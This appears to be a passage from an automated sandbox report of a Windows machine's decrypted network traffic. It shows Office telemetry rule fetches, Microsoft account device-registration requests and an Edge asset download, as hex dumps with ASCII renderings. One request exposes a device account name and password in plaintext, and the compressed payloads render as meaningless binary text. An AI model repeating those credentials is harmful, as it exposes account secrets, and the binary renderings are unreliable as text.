                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:42 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                    66192.168.2.74982920.231.128.67443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:42 UTC446OUTPOST /ppsecure/deviceaddcredential.srf HTTP/1.0
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Content-Type: application/soap+xml
                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                                                                                                    Content-Length: 7642
                                                                                                                                                                                                                                                                                                                    Host: login.live.com
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:42 UTC7642OUTData Raw: 3c 44 65 76 69 63 65 41 64 64 52 65 71 75 65 73 74 3e 3c 43 6c 69 65 6e 74 49 6e 66 6f 20 6e 61 6d 65 3d 22 49 44 43 52 4c 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3e 3c 42 69 6e 61 72 79 56 65 72 73 69 6f 6e 3e 32 34 3c 2f 42 69 6e 61 72 79 56 65 72 73 69 6f 6e 3e 3c 2f 43 6c 69 65 6e 74 49 6e 66 6f 3e 3c 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 3e 3c 4d 65 6d 62 65 72 6e 61 6d 65 3e 30 32 67 6b 69 69 72 6b 6a 64 62 64 78 76 6a 71 3c 2f 4d 65 6d 62 65 72 6e 61 6d 65 3e 3c 50 61 73 73 77 6f 72 64 3e 71 4a 6b 71 6c 42 41 74 3b 4a 67 4a 6f 48 6a 34 74 2e 42 62 3c 2f 50 61 73 73 77 6f 72 64 3e 3c 2f 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 3e 3c 4f 6c 64 4d 65 6d 62 65 72 6e 61 6d 65 3e 30 32 71 74 6c 74 6e 74 63 62 72 65 71 75 61 6a 3c 2f 4f 6c 64 4d
                                                                                                                                                                                                                                                                                                                    Data Ascii: <DeviceAddRequest><ClientInfo name="IDCRL" version="1.0"><BinaryVersion>24</BinaryVersion></ClientInfo><Authentication><Membername>02gkiirkjdbdxvjq</Membername><Password>qJkqlBAt;JgJoHj4t.Bb</Password></Authentication><OldMembername>02qtltntcbrequaj</OldM
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:44 UTC542INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Expires: Wed, 27 Nov 2024 08:05:42 GMT
                                                                                                                                                                                                                                                                                                                    P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                                                                                                    Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                                                    x-ms-route-info: C526_BAY
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: af37f634-d74a-46ac-af80-62b12be112a9
                                                                                                                                                                                                                                                                                                                    PPServer: PPV: 30 H: PH1PEPF00011EA3 V: 0
                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:43 GMT
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Content-Length: 17166
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:44 UTC15842INData Raw: 3c 44 65 76 69 63 65 41 64 64 52 65 73 70 6f 6e 73 65 20 53 75 63 63 65 73 73 3d 22 74 72 75 65 22 3e 3c 73 75 63 63 65 73 73 3e 74 72 75 65 3c 2f 73 75 63 63 65 73 73 3e 3c 70 75 69 64 3e 30 30 31 38 30 30 31 32 38 32 45 45 33 34 45 46 3c 2f 70 75 69 64 3e 3c 44 65 76 69 63 65 54 70 6d 4b 65 79 53 74 61 74 65 3e 33 3c 2f 44 65 76 69 63 65 54 70 6d 4b 65 79 53 74 61 74 65 3e 3c 4c 69 63 65 6e 73 65 20 43 6f 6e 74 65 6e 74 49 44 3d 22 33 32 35 32 62 32 30 63 2d 64 34 32 35 2d 34 37 31 31 2d 38 63 63 35 2d 62 32 66 35 33 63 38 33 30 62 37 36 22 20 49 44 3d 22 30 35 64 30 63 34 65 30 2d 38 66 33 38 2d 34 64 66 62 2d 62 64 35 37 2d 63 32 30 38 33 37 34 30 32 62 32 36 22 20 4c 69 63 65 6e 73 65 49 44 3d 22 33 32 35 32 62 32 30 63 2d 64 34 32 35 2d 34 37 31 31
                                                                                                                                                                                                                                                                                                                    Data Ascii: <DeviceAddResponse Success="true"><success>true</success><puid>0018001282EE34EF</puid><DeviceTpmKeyState>3</DeviceTpmKeyState><License ContentID="3252b20c-d425-4711-8cc5-b2f53c830b76" ID="05d0c4e0-8f38-4dfb-bd57-c20837402b26" LicenseID="3252b20c-d425-4711
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:44 UTC1324INData Raw: 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 39 2f 78 6d 6c 64 73 69 67 23 65 6e 76 65 6c 6f 70 65 64 2d 73 69 67 6e 61 74 75 72 65 22 2f 3e 3c 2f 54 72 61 6e 73 66 6f 72 6d 73 3e 3c 44 69 67 65 73 74 4d 65 74 68 6f 64 20 41 6c 67 6f 72 69 74 68 6d 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 30 34 2f 78 6d 6c 65 6e 63 23 73 68 61 32 35 36 22 2f 3e 3c 44 69 67 65 73 74 56 61 6c 75 65 3e 67 74 71 77 70 52 35 66 47 44 61 6f 48 73 4d 37 49 57 47 4b 5a 67 61 77 58 61 30 42 50 69 47 61 65 35 62 49 75 6e 2f 52 51 4a 41 3d 3c 2f 44 69 67 65 73 74 56 61 6c 75 65 3e 3c 2f 52 65 66 65 72 65 6e 63 65 3e 3c 2f 53 69 67 6e 65 64 49 6e 66 6f 3e 3c 53 69 67 6e 61 74 75 72 65 56 61 6c 75 65 3e 41 46 38 6f 46 52 2b 47 66
                                                                                                                                                                                                                                                                                                                    Data Ascii: tp://www.w3.org/2000/09/xmldsig#enveloped-signature"/></Transforms><DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256"/><DigestValue>gtqwpR5fGDaoHsM7IWGKZgawXa0BPiGae5bIun/RQJA=</DigestValue></Reference></SignedInfo><SignatureValue>AF8oFR+Gf


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                    67192.168.2.74982720.231.128.67443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:42 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Content-Type: application/soap+xml
                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                                                                                                    Content-Length: 3592
                                                                                                                                                                                                                                                                                                                    Host: login.live.com
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:42 UTC3592OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:43 UTC568INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                    Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                                                                                                                                    Expires: Wed, 27 Nov 2024 08:05:42 GMT
                                                                                                                                                                                                                                                                                                                    P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                                                                                                    Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                                                    x-ms-route-info: C531_BAY
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: e63e3def-6c96-4977-9098-d58fa062bc63
                                                                                                                                                                                                                                                                                                                    PPServer: PPV: 30 H: PH1PEPF0001B799 V: 0
                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:42 GMT
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Content-Length: 1276
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:43 UTC1276INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                    68192.168.2.74983413.107.246.634438168C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:43 UTC711OUTGET /assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Host: edgeassetservice.azureedge.net
                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                    Edge-Asset-Group: EntityExtractionDomainsConfig
                                                                                                                                                                                                                                                                                                                    Sec-Mesh-Client-Edge-Version: 117.0.2045.47
                                                                                                                                                                                                                                                                                                                    Sec-Mesh-Client-Edge-Channel: stable
                                                                                                                                                                                                                                                                                                                    Sec-Mesh-Client-OS: Windows
                                                                                                                                                                                                                                                                                                                    Sec-Mesh-Client-OS-Version: 10.0.19045
                                                                                                                                                                                                                                                                                                                    Sec-Mesh-Client-Arch: x86_64
                                                                                                                                                                                                                                                                                                                    Sec-Mesh-Client-WebView: 0
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:44 UTC555INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:43 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                                    Content-Length: 70207
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    Last-Modified: Fri, 22 Nov 2024 21:01:12 GMT
                                                                                                                                                                                                                                                                                                                    ETag: 0x8DD0B38CBCCFA90
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: e1bd38c5-801e-0032-6b7f-4030d7000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                                                                                    x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                                                                                    x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080643Z-174f7845968nxc96hC1EWRspw80000000wcg000000006byn
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:44 UTC15829INData Raw: 1f 8b 08 08 18 f1 40 67 02 ff 61 73 73 65 74 00 ec bd 0b 97 db 36 b2 30 f8 57 b2 b9 33 b3 dd 89 d5 d6 5b dd d9 cd fa f4 d3 f1 f8 39 6d 3b 19 db f1 d5 01 49 48 a2 45 91 0c 1f 6a ab c3 be bf 7d 0b 05 80 00 08 50 52 db ce 77 ef b7 67 67 9c 16 09 14 0a 40 a1 50 a8 2a 14 c0 3f bf f7 93 78 16 ce bf ff e9 bb 3f bf 2f 92 25 8d a7 51 b8 0a 0b 78 ef 8d bb dd 07 df 7d 9f 92 39 9d fa 65 91 cc 66 90 38 1c f4 59 62 40 67 a4 8c 8a 69 94 f8 24 a2 d3 15 49 11 81 c7 f0 c0 df 0e 3c 00 94 97 e3 6b de f1 08 7b a5 11 7b a5 51 67 9e e1 6b 8c af 71 a7 cc f1 15 81 69 de 59 7d c6 d7 02 5f 8b 0e a5 ec d5 c7 5c 3f ef f8 b7 ec 35 20 ec 35 20 9d 60 89 af 14 5f 69 27 40 e0 19 e6 ce 48 27 c4 8a 66 21 be 86 1d 78 60 af 19 be 66 9d 19 e6 2e b0 ec 82 76 c2 08 5f 31 77 91 75 16 3c b7 c4 d7
                                                                                                                                                                                                                                                                                                                    Data Ascii: @gasset60W3[9m;IHEj}PRwgg@P*?x?/%Qx}9ef8Yb@gi$I<k{{QgkqiY}_\?5 5 `_i'@H'f!x`f.v_1wu<
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:44 UTC16384INData Raw: c0 2a 8a c3 88 95 9c 7c 3e a9 79 09 d4 fa 9a 9f 30 4a 49 28 2b d7 97 ff 7a 7b f9 fa cd f4 c9 05 68 2b 37 9c c1 08 01 cb 2f 28 f3 02 34 de 08 0c a6 34 da 38 c6 ec 48 27 33 28 96 9f 45 d9 4f 9f 12 f7 54 d2 47 a6 39 87 08 81 e9 6d 4f c1 43 97 10 bf ad 59 55 67 39 13 fe 1e 05 67 65 16 87 6c 9b f5 cb 90 60 eb 3d ea 25 09 33 8b f9 4a fb 10 ef 11 3b 7c e8 61 60 14 a0 60 b9 7c 16 e7 69 54 b1 c3 22 c0 e0 29 df c2 05 4c 8f bc f0 67 5e 04 75 33 51 9a b7 e1 61 1a 61 48 f5 c3 30 f7 62 91 d5 a8 34 39 2a 97 ff 2d f5 aa c1 c2 6c 78 e0 35 33 d1 42 b3 75 c4 be 3b f4 d0 68 83 51 a7 81 2d a0 ff 0d 5d 10 62 ed 7f 55 a5 99 9f 25 2b 2f a4 4d 09 21 65 43 c7 04 cf 93 19 f3 c1 d0 b6 e9 14 38 59 31 29 8b 4d 52 3a c4 97 c1 d0 1d 5d d0 58 b3 51 22 09 e8 37 c0 b1 dc 86 43 a9 41 db b1
                                                                                                                                                                                                                                                                                                                    Data Ascii: *|>y0JI(+z{h+7/(448H'3(EOTG9mOCYUg9gel`=%3J;|a``|iT")Lg^u3QaaH0b49*-lx53Bu;hQ-]bU%+/M!eC8Y1)MR:]XQ"7CA
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:44 UTC16384INData Raw: 15 b1 bc 1f 82 9a 8d 98 a7 af db 80 6b 74 e7 ab 7c e6 18 7d 9a 2b 3e 34 2d 1a e7 c0 d5 e8 b4 a0 0e d4 7d 19 bb 69 52 58 a2 33 32 78 db 4b 2d cd 54 dd d2 2b 9c a0 29 69 1a ba 4a ee 0a 4d 33 5a 7b a7 1a 83 5f f3 f7 fe 2c 2f 84 3b 39 d0 56 82 ef 75 a4 f3 69 57 af 58 09 8c 2a 1d 24 b9 4e 6b cf 63 d0 74 99 e3 02 0f 26 7f 1a 86 a9 a8 69 fa 5a d8 25 83 c1 ea f8 fd 12 62 16 86 38 17 5a 19 6f 13 03 00 e6 6a 07 a4 40 be bb 20 de a6 de bf d1 06 75 32 1f c3 4f 67 41 ad 31 bd b0 9c ee 44 47 33 2a 92 9c d3 f6 35 64 a9 b1 d3 f6 b1 c7 a7 b4 80 af ea c1 2a 6c dd 81 a0 0b 67 ca d2 b2 11 7c 8d dc 39 47 56 d1 bd 08 e8 ec 3e 4f c9 56 d6 7a d3 9a 56 4d 17 50 41 9b 17 9b 37 36 da 2e 7c a4 ba 63 f5 72 cd 6b 58 b5 9b 70 5a 19 73 3e 85 d2 c6 f8 80 22 71 cd f5 40 34 cd c4 ce 27 1e
                                                                                                                                                                                                                                                                                                                    Data Ascii: kt|}+>4-}iRX32xK-T+)iJM3Z{_,/;9VuiWX*$Nkct&iZ%b8Zoj@ u2OgA1DG3*5d*lg|9GV>OVzVMPA76.|crkXpZs>"q@4'
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:44 UTC16384INData Raw: 43 54 c9 8d d7 76 7a 14 e4 6f 3b 80 f7 6a 61 e8 6f 47 e9 2d cb 60 84 66 2b c0 b9 77 09 1b c0 32 5c aa 6c 0e 25 81 ed a0 5e 61 25 37 6f 3c a5 bc 1f 04 1a dd b1 04 1d c9 73 16 3a 58 a8 69 4d 12 c1 5e e9 66 5f 14 6c e4 9e d4 61 25 e1 2f c3 fc b8 ed df 80 5d 2b 3a 5b 4c 56 c9 72 1f 59 1d 6a 72 0b d2 b0 4c 8e d5 67 db 16 79 41 90 65 4f 4b 68 63 f6 d1 e5 db b6 6a 18 e6 ca 5f 04 79 2e 71 69 5d 0e 19 cc d9 f6 58 27 58 af 1c 18 04 f1 98 d2 bf 15 1e 37 ce e0 1e 88 54 83 3c 82 f8 a8 05 5f b0 1b 3f 2f 02 8f 31 a4 e9 1d ed 45 e6 e4 85 e6 b9 66 4c fd cd 8d e4 58 f7 79 73 8b 47 40 25 b6 0d 7f 78 ff a8 fe e7 7d 69 4a fc 00 c7 b0 37 a9 44 f0 40 1e e8 bd 41 8a b4 0a 5d 5a 2c 0e 60 f7 fb 81 3b 35 42 38 50 3b bc 9c d4 76 22 35 66 3f 5d d9 fb 8e 7d 65 84 fb 4f 5b 04 9b a8 7d
                                                                                                                                                                                                                                                                                                                    Data Ascii: CTvzo;jaoG-`f+w2\l%^a%7o<s:XiM^f_la%/]+:[LVrYjrLgyAeOKhcj_y.qi]X'X7T<_?/1EfLXysG@%x}iJ7D@A]Z,`;5B8P;v"5f?]}eO[}
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:44 UTC5226INData Raw: b1 61 ca d2 f5 ed 38 df 10 b9 60 88 4c 48 ac b1 cd 10 b5 8f 76 49 19 f2 b6 d5 54 1d d1 9c b1 20 7a d3 64 f7 91 a2 0c 4d 73 6d e0 da be ee e6 87 03 9f 5e f7 4f 98 9c 12 cd 88 68 4c 2e b1 48 00 60 c3 31 74 31 8d 87 b4 32 56 02 4f bf e1 a9 3b c0 40 d6 24 8e 10 55 c7 c3 e7 8c f3 78 28 78 d3 94 de b0 5a 4d 22 eb 28 5c 22 00 98 8e 15 1a f8 ab ac 54 f4 5d 80 d0 a5 aa 6e 87 83 fd d6 f1 b0 c0 82 f7 f4 5e ef 2f 2b b8 62 a2 13 a1 4d ae 60 cf 59 3c b1 b1 f4 40 4d 41 74 7c ac 2c 5a 9e ef f4 d2 81 6d 69 e1 d3 8b 73 2c 84 2c 06 37 fd 72 38 10 a5 b2 13 51 f1 a0 a2 06 7d 3f 89 8f 72 35 a0 58 a0 46 79 2f b7 1f cc 57 92 ec c8 b4 b5 f2 5c 65 e7 30 5a 93 e3 b1 8e 5f f5 91 44 87 44 19 1d 59 83 cf 54 85 de 92 34 2e 26 d2 d8 ca 80 2c 56 f9 34 27 86 21 28 e6 0e 92 0c 4e 75 b7 c0
                                                                                                                                                                                                                                                                                                                    Data Ascii: a8`LHvIT zdMsm^OhL.H`1t12VO;@$Ux(xZM"(\"T]n^/+bM`Y<@MAt|,Zmis,,7r8Q}?r5XFy/W\e0Z_DDYT4.&,V4'!(Nu


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    69192.168.2.74984013.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:44 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:44 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:44 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 419
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BB7F164C3"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: 09dbda49-a01e-003d-2d45-4098d7000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080644Z-174f7845968jrjrxhC1EWRmmrs0000000wv0000000002zh8
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:44 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    70192.168.2.74983813.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:44 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:44 UTC470INHTTP/1.1 200 OK
